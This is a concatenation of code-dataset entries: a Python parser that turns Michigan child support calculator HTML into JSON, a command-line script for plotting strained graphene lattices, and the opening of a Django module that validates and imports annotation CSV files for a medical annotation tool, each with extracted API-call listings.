output_data = extract_data(html_file.path())
json_file.initialize(filename=base_name + '.json')
json_file.write(json.dumps(output_data, indent=2))
json_file.commit()
except Exception as err:
success = False
output += err.__class__.__name__ + ": " + str(err)
output_data = {"error": err.__class__.__name__, "message": str(err)}
else:
output_data = {}
return success, output, output_data
def process_table(table):
result = dict()
result['title'] = table.get('title', None)
result['columns'] = []
result['rows'] = []
result['footer'] = []
for head in table.find_all('thead', recursive=False):
result['columns'].append(head.get_text().strip())
for body in table.find_all('tbody', recursive=False):
for row in body.find_all('tr', recursive=False):
output_row = []
item = list()
for col in row.find_all('td', recursive=False):
output_row.append(fixup(col))
result['rows'].append(output_row)
for foot in table.find_all('tfoot', recursive=False):
result['footer'].append(foot.get_text().strip())
return result
def fixup(elem):
children = [item for item in elem.find_all(recursive=False) if item.name != 'br']
if len(children) == 1:
orig_elem = elem
elem = children[0]
#log("kids1: found a " + elem.name + " with " + repr(elem.get_text()))
if elem.name == 'output':
text = orig_elem.get_text().strip()
elif elem.name == 'div':
found = False
tables = list()
for table in elem.find_all('table'):
found = True
tables.append(process_table(table))
# for head in table.find_all('thead', recursive=False):
# tables.append(head.get_text().strip())
if found:
return tables
text = orig_elem.get_text().strip()
elif elem.name == 'table':
#tables = list()
#for head in elem.find_all('thead', recursive=False):
# tables.append(head.get_text().strip())
#return tables
return process_table(elem)
elif elem.name == 'input':
text = elem.get('value')
else:
#log("doing get text and strip")
text = elem.text.strip()
#log("doing elem is" + repr(text))
text = re.sub(r'<br/?>', ' ', text)
elif len(children) == 2 and children[0].name == 'table' and children[1].name == 'table':
return [process_table(children[0]), process_table(children[1])]
elif len(children) == 2 and children[0].name == 'a' and children[1].name == 'label':
text = children[1].get_text().strip()
elif len(children) == 2 and children[0].name == 'output' and children[1].name == 'output':
text = children[0].get_text().strip() + " " + children[1].get_text().strip()
elif len(children) == 3 and children[0].name == 'div' and children[1].name == 'div' and children[2].name == 'div':
#log("Triple div first kid is " + repr(str(children[0])))
text = children[0].get_text().strip() + " " + children[1].get_text().strip() + " " + children[2].get_text().strip()
#log("Triple div Got " + repr(text))
elif len(children) == 2 and children[0].name == 'div' and children[1].name == 'div':
text = children[0].get_text().strip() + " " + children[1].get_text().strip()
elif len(children) == 2 and children[0].name == 'strong' and children[1].name == 'strong':
text = children[0].get_text().strip() + " " + children[1].get_text().strip()
elif len(children) == 2 and children[0].name == 'p' and children[1].name == 'p':
text = children[0].get_text().strip() + " " + children[1].get_text().strip()
elif len(children) == 2 and children[0].name == 'div' and children[1].name == 'p':
text = children[1].get_text().strip()
else:
#log("found a " + elem.name + " with " + repr(elem.get_text()))
#log("kids is " + ";".join(repr(item.name) for item in children))
text = elem.decode_contents().strip()
#log("elem is" + repr(text))
text = re.sub(r'<br/?>', ' ', text)
if not isinstance(text, str):
return text
text = re.sub(r' ', ' ', text)
text = re.sub(r' +', ' ', text)
text = re.sub(r'\n\t+', ' ', text)
text = text.strip()
m = re.search(r'^\$([0-9]+\.[0-9][0-9])$', text)
if m:
text = float(m.group(1))
return text
def nulltruefalse(item):
if isinstance(item, str):
if item in ('false', 'No'):
return False
if item in ('true', 'Yes'):
return True
if item in ('-', ''):
return None
if re.search(r'^\-?[0-9]+$', item):
try:
return int(item)
except:
pass
if '.' in item and re.search(r'^\-?[0-9\.]+$', item):
try:
return float(item)
except:
pass
if re.search(r'^[0-9\.]+\%$', item):
try:
return float(item[0:-1])/100.0
except:
pass
return item
def get_amount_potential(text):
if not isinstance(text, str):
return (text, False)
if '(PC)' in text:
potential = True
else:
potential = False
m = re.search(r'^\$([0-9\.]+)', text)
if m:
try:
text = float(m.group(1))
except:
pass
return (text, potential)
def extract_data(filename):
results = {"parts": [], "hidden": {}, "summary": []}
with open(filename) as fp:
s = Soup(fp.read(), "html.parser")
for inp in s.select('input[type="hidden"]'):
results['hidden'][inp.get('id') or inp.get('name')] = inp.get('value')
for i in range(3):
for div in s.select('#showResult' + str(i)):
link_text = div.get_text().strip()
link_text = re.sub(r'\s+', ' ', link_text)
link_text = re.sub(r'Show Result [0-9]+: ', '', link_text)
results['summary'].append(link_text)
for div in s.select('#paymentRelationship' + str(i)):
result = {}
for table in div.find_all('table', recursive=False):
heading = None
for head in table.find_all('thead', recursive=False):
heading = head.get_text().strip()
if not heading:
raise Exception("Table has no heading")
heading = re.sub(r'^Section:\s*', '', heading)
result[heading] = []
for body in table.find_all('tbody', recursive=False):
for row in body.find_all('tr', recursive=False):
item = list()
for col in row.find_all('td', recursive=False):
item.append(fixup(col))
result[heading].append(item)
results['parts'].append(result)
#log("Raw:")
#log(json.dumps(results, indent=2))
main_output = {'results': [], 'information': {}, 'summaries': []}
for part in results['parts']:
output = dict()
for item in ('General Information', 'Eliminate Ordinary Medical Expenses', 'Calculation Results', 'Children', 'Financial', 'Base Support Calculation', 'Child Care'):
if item not in part:
raise Exception(item + " not found")
for item in part['General Information']:
if item[0] == 'Court Case Number' and len(item) >= 4:
output['Court Case Number'] = item[1]
if item[2] == 'Court Case County':
output['Court Case County'] = item[3]
elif item[0] == 'Calculation Parties' and len(item) >= 4:
output['Calculation Parties'] = [item[1], item[3]]
elif item[0] == 'Description' and len(item) > 1:
output['Description'] = item[1]
elif item[0] == 'Michigan Child Support Formula Year' and len(item) >= 6:
output[item[0]] = item[1]
output[item[2]] = item[3]
output[item[4]] = item[5]
headers = None
for item in part['Eliminate Ordinary Medical Expenses']:
if item[0] == "":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Eliminate Ordinary Medical Expenses")
subout = dict()
for item in part['Eliminate Ordinary Medical Expenses']:
if item[0] == "":
continue
if len(item) == 1 + len(headers):
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
subout[item[0]] = subsubout
if len(item) == 2 and item[0] == 'Select Reason for Eliminating the Ordinary Medical Expense(s):':
subout[item[0]] = item[1]
output['Eliminate Ordinary Medical Expenses'] = subout
headers = None
for item in part['Calculation Results']:
if item[0] == "":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Calculation Results")
subout = dict()
for item in part['Calculation Results']:
if item[0] == "":
continue
if len(item) == 1 + len(headers):
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
subout[item[0]] = subsubout
if len(item) == 2 and item[0] == 'Select Reason for Eliminating the Ordinary Medical Expense(s):':
subout[item[0]] = item[1]
output['Calculation Results'] = subout
headers = None
for item in part['Children']:
if item[0] == "Children's Overnights Spent Per Year":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Children")
subout = dict()
overnights = dict()
for item in part['Children']:
if item[0] == "Children's Overnights Spent Per Year":
continue
if len(item) == 1 + len(headers):
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
if item[0] in ('Additional Children from Other Relationships', 'Child Support Children in Other Payment Relationships', 'Total Other Children', 'Income Adjustment Percentage Multiplier'):
subout[item[0]] = subsubout
else:
for i in range(len(headers)):
if headers[i] not in overnights:
overnights[headers[i]] = dict()
overnights[headers[i]][item[0]] = nulltruefalse(item[i + 1])
subout["Children's Overnights Spent Per Year"] = overnights
output["Children"] = subout
subout = dict(notes=list())
headers = None
for item in part['Financial']:
if item[0] == "See 2021 MCSF 2.01":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Financial")
for item in part['Financial']:
if len(item) > 0 and isinstance(item[0], list):
if len(item[0]) > len(headers):
raise Exception("Unrecognized row of tables in Financial section. Expected " + str(len(headers)) + " and got " + str(len(item[0])) + " where content is " + repr(item[0]) + " and headers are " + repr(headers))
for i in range(len(headers)):
if i >= len(item[0]):
continue
table = item[0][i]
if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
raise Exception("Unrecognized table " + repr(table) + " in Financial section")
table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
if table_title not in subout:
subout[table_title] = dict()
subsubout = dict()
for subitem in table['rows']:
if not len(subitem) == 2:
raise Exception("Unrecognized row in table in Financial section")
subsubout[subitem[0]] = subitem[1]
subout[table_title][headers[i]] = subsubout
elif len(item) == 1 and isinstance(item[0], str):
subout['notes'].append(item[0])
elif len(item) == 2:
subout[item[0]] = item[1]
elif len(item) == 1 + len(headers):
if item[0] in ("See 2021 MCSF 2.01", "Additional Deductions"):
continue
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
label = item[0]
label = re.sub(r' See 2021 MCSF 2.01', '', item[0])
subout[label] = subsubout
output["Financial"] = subout
subout = dict()
headers = None
for item in part['Base Support Calculation']:
if item[0] == "See 2021 MCSF 3.02(A)":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Base Support Calculation")
for item in part['Base Support Calculation']:
if not len(item) == 1 + len(headers):
raise Exception("Unrecognized row in Base Support Calculation")
if item[0] == "See 2021 MCSF 3.02(A)":
continue
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
subout[item[0]] = subsubout
output["Base Support Calculation"] = subout
subout = dict(notes=list())
reimbursement_end_dates = list()
headers = None
for item in part['Child Care']:
if len(item) and item[0] == "See 2021 MCSF 3.06(C) and 2021 MCSF 3.06(D)":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Child Care")
for item in part['Child Care']:
if len(item) > 0 and isinstance(item[0], list):
if len(item[0]) != len(headers):
raise Exception("Unrecognized row of tables in Child Care section")
for i in range(len(headers)):
table = item[0][i]
if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
raise Exception("Unrecognized table " + repr(table) + " in Child Care section")
if len(table['rows']) == 1:
continue
table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
table_title = re.sub(r'Child Care Expense Information Table', 'Child Care Expenses Information Table', table_title)
if table_title not in subout:
subout[table_title] = dict()
subsubout = list()
for subitem in table['rows']:
if not len(subitem) == 2:
raise Exception("Unrecognized row in table in Child Care section")
if subitem[0] == 'Months':
if len(subsubout) == 0:
raise Exception("Unrecognized Months row in Child Care section")
subsubout[-1]['months'] = subitem[1]
else:
amount, is_potential = get_amount_potential(subitem[1])
subsubout.append({'child': subitem[0], 'amount': amount, 'potential': is_potential})
subout[table_title][headers[i]] = subsubout
elif len(item) == 0:
continue
elif len(item) == 1 and isinstance(item[0], str):
subout['notes'].append(item[0])
elif len(item) == 2:
reimbursement_end_dates.append({'child': item[0], 'date': item[1]})
elif len(item) == 1 + len(headers):
if item[0] == "See 2021 MCSF 3.06(C) and 2021 MCSF 3.06(D)":
continue
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
subout[item[0]] = subsubout
subout["Reimbursement End Dates"] = reimbursement_end_dates
output["Medical"] = subout
subout = dict(notes=list())
headers = None
for item in part['Medical']:
if len(item) and item[0] == "See 2021 MCSF 3.05(C) See 2021 MCSF 3.04(B)":
headers = item[1:]
break
if headers is None:
raise Exception("Could not find header row for Medical")
for item in part['Medical']:
if len(item) > 0 and isinstance(item[0], list):
if len(item[0]) != len(headers):
raise Exception("Unrecognized row of tables in Medical section")
for i in range(len(headers)):
table = item[0][i]
if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
raise Exception("Unrecognized table " + repr(table) + " in Medical section")
if len(table['rows']) == 1:
continue
table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
if table_title not in subout:
subout[table_title] = dict()
subsubout = list()
for subitem in table['rows']:
if not len(subitem) == 2:
raise Exception("Unrecognized row in table in Medical section")
subsubout.append({'child': subitem[0], 'amount': amount})
subout[table_title][headers[i]] = subsubout
if 'footer' in table:
subout[table_title + " Note"] = '\n'.join(table['footer'])
elif len(item) == 0:
continue
elif len(item) == 1 and isinstance(item[0], str):
subout['notes'].append(item[0])
elif len(item) == 2:
subout[item[0]] = item[1]
elif len(item) == 1 + len(headers):
if item[0] in ("See 2021 MCSF 3.05(C) See 2021 MCSF 3.04(B)", "Additional Out-of-pocket Medical Expenses Per Child"):
continue
subsubout = dict()
for i in range(len(headers)):
subsubout[headers[i]] = nulltruefalse(item[i + 1])
subout[item[0]] = subsubout
output["Medical"] = subout
main_output['results'].append(output)
for item, val in results['hidden'].items():
main_output["information"][item] = nulltruefalse(val)
for item in results['summary']:
main_output['summaries'].append(item)
return main_output
# if __name__ == "__main__":
# filename = 'mi-results.html'
# raw_data = extract_data('mi-results.html')
# print("Final:")
# print(json.dumps(raw_data, indent=2))
| [
"subprocess.check_output",
"tempfile.TemporaryDirectory",
"docassemble.base.util.value",
"docassemble.base.util.validation_error",
"json.dumps",
"os.path.join",
"docassemble.base.util.force_ask",
"docassemble.base.util.path_and_mimetype",
"os.path.isfile",
"docassemble.base.util.space_to_underscor... | [((1530, 1577), 're.search', 're.search', (['"""[^A-Za-z\\\\\' 0-9\\\\_\\\\-\\\\n\\\\r]"""', 'text'], {}), '("[^A-Za-z\\\\\' 0-9\\\\_\\\\-\\\\n\\\\r]", text)\n', (1539, 1577), False, 'import re\n'), ((1781, 1811), 'docassemble.base.util.space_to_underscore', 'space_to_underscore', (['base_name'], {}), '(base_name)\n', (1800, 1811), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((8368, 8393), 're.sub', 're.sub', (['"""\xa0"""', '""" """', 'text'], {}), "('\\xa0', ' ', text)\n", (8374, 8393), False, 'import re\n'), ((8403, 8427), 're.sub', 're.sub', (['""" +"""', '""" """', 'text'], {}), "(' +', ' ', text)\n", (8409, 8427), False, 'import re\n'), ((8440, 8468), 're.sub', 're.sub', (['"""\\\\n\\\\t+"""', '""" """', 'text'], {}), "('\\\\n\\\\t+', ' ', text)\n", (8446, 8468), False, 'import re\n'), ((8500, 8545), 're.search', 're.search', (['"""^\\\\$([0-9]+\\\\.[0-9][0-9])$"""', 'text'], {}), "('^\\\\$([0-9]+\\\\.[0-9][0-9])$', text)\n", (8509, 8545), False, 'import re\n'), ((9479, 9513), 're.search', 're.search', (['"""^\\\\$([0-9\\\\.]+)"""', 'text'], {}), "('^\\\\$([0-9\\\\.]+)', text)\n", (9488, 9513), False, 'import re\n'), ((1589, 1675), 'docassemble.base.util.validation_error', 'validation_error', (['"""You are only allowed to type characters A-Z, a-z, 0-9, and -."""'], {}), "(\n 'You are only allowed to type characters A-Z, a-z, 0-9, and -.')\n", (1605, 1675), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((8846, 8877), 're.search', 're.search', (['"""^\\\\-?[0-9]+$"""', 'item'], {}), "('^\\\\-?[0-9]+$', item)\n", (8855, 8877), False, 'import re\n'), ((9136, 9169), 're.search', 're.search', (['"""^[0-9\\\\.]+\\\\%$"""', 'item'], {}), "('^[0-9\\\\.]+\\\\%$', item)\n", (9145, 9169), False, 'import re\n'), ((935, 970), 'docassemble.base.util.force_ask', 'force_ask', (['"""no_child_with_guardian"""'], {}), "('no_child_with_guardian')\n", (944, 970), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((1834, 1878), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {'prefix': '"""datemp"""'}), "(prefix='datemp')\n", (1861, 1878), False, 'import tempfile\n'), ((1924, 1967), 'os.path.join', 'os.path.join', (['temp_directory', '"""output.html"""'], {}), "(temp_directory, 'output.html')\n", (1936, 1967), False, 'import os\n'), ((1993, 2035), 'os.path.join', 'os.path.join', (['temp_directory', '"""output.png"""'], {}), "(temp_directory, 'output.png')\n", (2005, 2035), False, 'import os\n'), ((8997, 9031), 're.search', 're.search', (['"""^\\\\-?[0-9\\\\.]+$"""', 'item'], {}), "('^\\\\-?[0-9\\\\.]+$', item)\n", (9006, 9031), False, 'import re\n'), ((815, 843), 'docassemble.base.util.value', 'value', (['"""child_support_group"""'], {}), "('child_support_group')\n", (820, 843), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((2132, 2172), 'os.path.join', 'os.path.join', (['temp_directory', '"""features"""'], {}), "(temp_directory, 'features')\n", (2144, 2172), False, 'import os\n'), ((2216, 2269), 'os.path.join', 'os.path.join', (['features_directory', '"""calculate.feature"""'], {}), "(features_directory, 'calculate.feature')\n", (2228, 2269), False, 'import os\n'), ((3163, 3190), 'os.path.isfile', 'os.path.isfile', (['output_file'], {}), '(output_file)\n', (3177, 3190), False, 'import os\n'), ((3508, 3534), 'os.path.isfile', 'os.path.isfile', (['output_png'], {}), '(output_png)\n', (3522, 3534), False, 'import os\n'), ((4126, 4159), 'json.dumps', 'json.dumps', (['output_data'], {'indent': '(2)'}), '(output_data, indent=2)\n', (4136, 4159), False, 'import json\n'), ((10094, 10124), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'link_text'], {}), "('\\\\s+', ' ', link_text)\n", (10100, 10124), False, 'import re\n'), ((10153, 10198), 're.sub', 're.sub', (['"""Show Result [0-9]+: """', '""""""', 'link_text'], {}), "('Show Result [0-9]+: ', '', link_text)\n", (10159, 10198), False, 'import re\n'), ((2085, 2127), 'docassemble.base.util.path_and_mimetype', 'path_and_mimetype', (['"""data/sources/features"""'], {}), "('data/sources/features')\n", (2102, 2127), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((10713, 10749), 're.sub', 're.sub', (['"""^Section:\\\\s*"""', '""""""', 'heading'], {}), "('^Section:\\\\s*', '', heading)\n", (10719, 10749), False, 'import re\n'), ((16529, 16573), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (16535, 16573), False, 'import re\n'), ((19572, 19616), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (19578, 19616), False, 'import re\n'), ((19652, 19756), 're.sub', 're.sub', (['"""Child Care Expense Information Table"""', '"""Child Care Expenses Information Table"""', 'table_title'], {}), "('Child Care Expense Information Table',\n 'Child Care Expenses Information Table', table_title)\n", (19658, 19756), False, 'import re\n'), ((22380, 22424), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (22386, 22424), False, 'import re\n'), ((2288, 2335), 'os.path.join', 'os.path.join', (['features_directory', '"""__init__.py"""'], {}), "(features_directory, '__init__.py')\n", (2300, 2335), False, 'import os\n'), ((2362, 2418), 'os.path.join', 'os.path.join', (['features_directory', '"""steps"""', '"""__init__.py"""'], {}), "(features_directory, 'steps', '__init__.py')\n", (2374, 2418), False, 'import os\n'), ((2865, 2944), 'subprocess.check_output', 'subprocess.check_output', (['commands'], {'cwd': 'temp_directory', 'stderr': 'subprocess.STDOUT'}), '(commands, cwd=temp_directory, stderr=subprocess.STDOUT)\n', (2888, 2944), False, 'import subprocess\n'), ((6500, 6527), 're.sub', 're.sub', (['"""<br/?>"""', '""" """', 'text'], {}), "('<br/?>', ' ', text)\n", (6506, 6527), False, 'import re\n'), ((17583, 17625), 're.sub', 're.sub', (['""" See 2021 MCSF 2.01"""', '""""""', 'item[0]'], {}), "(' See 2021 MCSF 2.01', '', item[0])\n", (17589, 17625), False, 'import re\n'), ((8274, 8301), 're.sub', 're.sub', (['"""<br/?>"""', '""" """', 'text'], {}), "('<br/?>', ' ', text)\n", (8280, 8301), False, 'import re\n')] |
#! /usr/bin/env python3
import sys
import argparse
from graphenetools import gt
def create_parser():
parser = argparse.ArgumentParser(description="Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("m", type=int,
help="Simulation cell parameter to generate `2*m*n` C1/3 adsorption sites")
parser.add_argument("n", type=int,
help="Simulation cell parameter to generate `2*m*n` C1/3 adsorption sites")
parser.add_argument("--strain", type=float, default=0.0,
help="Value of strain in armchair direction")
parser.add_argument("--carbon_carbon_distance", type=float, default=1.42,
help="Distance in angstrom between adjacent carbon atoms in isotropic graphene")
parser.add_argument("--poisson_ratio", type=float, default=0.165,
help="Poisson's ratio, (the ratio of transverse contraction strain to longitudinal extension strain in the direction of the stretching force) for graphene")
parser.add_argument('--mplstylefile', type=str, default="default",
help='Location of stylefile to use with plotting')
parser.add_argument("--dpi", type=float, default=None,
help="DPI of saved plot. Defaults to `rcParams[\"savefig.dpi\"]`")
parser.add_argument("--savefig", type=str, default="",
help="Location to save plot. Image type based on extension. Will not save if empty.")
return parser
def main(argv=None):
"""
:desc: Print command line arguments for uniaxially strained graphene and use with QMC software located at https://code.delmaestro.org
"""
if argv is None:
argv = sys.argv
parser = create_parser()
args = parser.parse_args(argv[1:])
gt.c_one_third_commensurate_command(args.m,args.n,args.strain,carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.poisson_ratio)
fig,ax = gt.c_one_third_commensurate_command_plot(args.m,args.n,args.strain,carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.poisson_ratio)
if args.savefig:
with gt.plt.style.context(args.mplstylefile):
fig.savefig(args.savefig,dpi=args.dpi)
fig.show()
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| [
"graphenetools.gt.plt.style.context",
"graphenetools.gt.c_one_third_commensurate_command_plot",
"graphenetools.gt.c_one_third_commensurate_command",
"argparse.ArgumentParser"
] | [((115, 404), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description=\n 'Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)'\n , formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (138, 404), False, 'import argparse\n'), ((2042, 2201), 'graphenetools.gt.c_one_third_commensurate_command', 'gt.c_one_third_commensurate_command', (['args.m', 'args.n', 'args.strain'], {'carbon_carbon_distance': 'args.carbon_carbon_distance', 'poisson_ratio': 'args.poisson_ratio'}), '(args.m, args.n, args.strain,\n carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.\n poisson_ratio)\n', (2077, 2201), False, 'from graphenetools import gt\n'), ((2203, 2367), 'graphenetools.gt.c_one_third_commensurate_command_plot', 'gt.c_one_third_commensurate_command_plot', (['args.m', 'args.n', 'args.strain'], {'carbon_carbon_distance': 'args.carbon_carbon_distance', 'poisson_ratio': 'args.poisson_ratio'}), '(args.m, args.n, args.strain,\n carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.\n poisson_ratio)\n', (2243, 2367), False, 'from graphenetools import gt\n'), ((2390, 2429), 'graphenetools.gt.plt.style.context', 'gt.plt.style.context', (['args.mplstylefile'], {}), '(args.mplstylefile)\n', (2410, 2429), False, 'from graphenetools import gt\n')] |
import psycopg2
import re
import json
from MedTAG_sket_dock_App.models import *
import os
import pandas as pd
import numpy
from psycopg2.extensions import register_adapter, AsIs
def addapt_numpy_float64(numpy_float64):
return AsIs(numpy_float64)
def addapt_numpy_int64(numpy_int64):
return AsIs(numpy_int64)
register_adapter(numpy.float64, addapt_numpy_float64)
register_adapter(numpy.int64, addapt_numpy_int64)
from django.db.models import Count
from django.db import transaction
import datetime
from MedTAG_sket_dock_App.utils import *
def check_uploaded_files(files):
"""This method checks whether the files uploaded by the user to copy the ground-truths are well formatted"""
json_resp = {}
json_resp['message'] = ''
for i in range(len(files)):
# Error if the file is not csv
if not files[i].name.endswith('csv'):
json_resp['message'] = 'ERROR - ' + files[i].name + ' - The file must be .csv'
return json_resp
try:
df = pd.read_csv(files[i])
df = df.where(pd.notnull(df), None)
df = df.reset_index(drop=True) # Useful if the csv includes only commas
except Exception as e:
print(e)
json_resp['message'] = 'ERROR - ' + files[
i].name + ' - An error occurred while parsing the csv. Check if it is well formatted. Check if it contains as many columns as they are declared in the header.'
return json_resp
else:
# check if colunns are allowed and without duplicates
cols = list(df.columns)
labels = ['username', 'annotation_mode', 'id_report', 'language', 'batch', 'institute', 'usecase', 'label']
mentions = ['username', 'annotation_mode', 'id_report', 'language', 'batch', 'institute', 'usecase',
'start', 'stop',
'mention_text']
concepts = ['username', 'annotation_mode', 'id_report', 'language', 'batch', 'institute', 'usecase',
'concept_url',
'concept_name', 'area']
linking = ['username', 'annotation_mode', 'id_report', 'language', 'batch', 'institute', 'usecase', 'start',
'stop',
'mention_text', 'concept_name', 'concept_url', 'area']
if set(cols) != set(labels) and set(cols) != set(mentions) and set(cols) != set(concepts) and set(cols) != set(linking):
json_resp['message'] = 'ERROR - ' + files[
i].name + ' - The set of columns you inserted in the csv does not correspond to those we ask. ' \
'Check the examples.'
return json_resp
if 'usecase' in cols:
df['usecase'] = df['usecase'].str.lower()
# Check if the csv is empty with 0 rows
if df.shape[0] == 0:
json_resp['message'] = 'ERROR - ' + files[
i].name + ' - You must provide at least a row.'
return json_resp
if len(files) > 0:
if json_resp['message'] == '':
json_resp['message'] = 'Ok'
return json_resp
def upload_files(files,user_to,overwrite):
"""This method handles the upload of csv files to copy th annotations from"""
json_resp = {'message':'Ok'}
mode_rob = NameSpace.objects.get(ns_id='Robot')
mode_hum = NameSpace.objects.get(ns_id='Human')
print(user_to)
username_rob = User.objects.get(username='Robot_user', ns_id=mode_rob)
try:
with transaction.atomic():
for i in range(len(files)):
df = pd.read_csv(files[i])
df = df.where(pd.notnull(df), None)
df = df.reset_index(drop=True) # Useful if the csv includes only commas
df.sort_values(['id_report','language','annotation_mode'])
cols = list(df.columns)
labels = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'label']
mentions = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'start', 'stop',
'mention_text']
concepts = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'concept_url',
'concept_name', 'area']
linking = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'start', 'stop',
'mention_text', 'concept_name', 'concept_url', 'area']
for i, g in df.groupby(['id_report','language','annotation_mode']):
count_rows = g.shape[0]
deleted_mentions = False
if df.annotation_mode.unique()[0] == 'Manual':
a = 'Human'
else:
a = 'Robot'
report_cur = Report.objects.get(id_report = str(g.id_report.unique()[0]), language = g.language.unique()[0] )
mode = NameSpace.objects.get(ns_id =a)
anno_mode = mode
if a == 'Robot' and GroundTruthLogFile.objects.filter(username = username_rob).count() == 0:
json_resp = {'message':'automatic missing'}
return json_resp
report = report_cur
g = g.reset_index()
action = ''
user = User.objects.get(username=user_to, ns_id=mode)
if set(cols) == set(labels):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='labels')
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
Associate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language,
gt_type='labels').delete()
Associate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
elif set(cols) == set(mentions):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='mentions')
robot_gt = GroundTruthLogFile.objects.filter(username=username_rob, ns_id=mode_rob,
id_report=report, language=report.language,
gt_type='mentions')
# ins_time = ''
# if robot_gt.exists():
# rob_first_gt = robot_gt.first()
# ins_time = rob_first_gt.insertion_time
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
# user_to_gt_first = user_to_gt.first()
# if user_to_gt_first.insertion_time == ins_time:
# GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
# id_report=report,
# language=report.language,
# gt_type='mentions').delete()
if Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept).delete()
links.delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
if Linked.objects.filter(username=user, ns_id=mode,id_report=report,language=report.language).exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept).delete()
links.delete()
elif set(cols) == set(concepts):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='concepts')
robot_gt = GroundTruthLogFile.objects.filter(username=username_rob, ns_id=mode_rob,
id_report=report, language=report.language,
gt_type='concepts')
# ins_time = ''
# if robot_gt.exists():
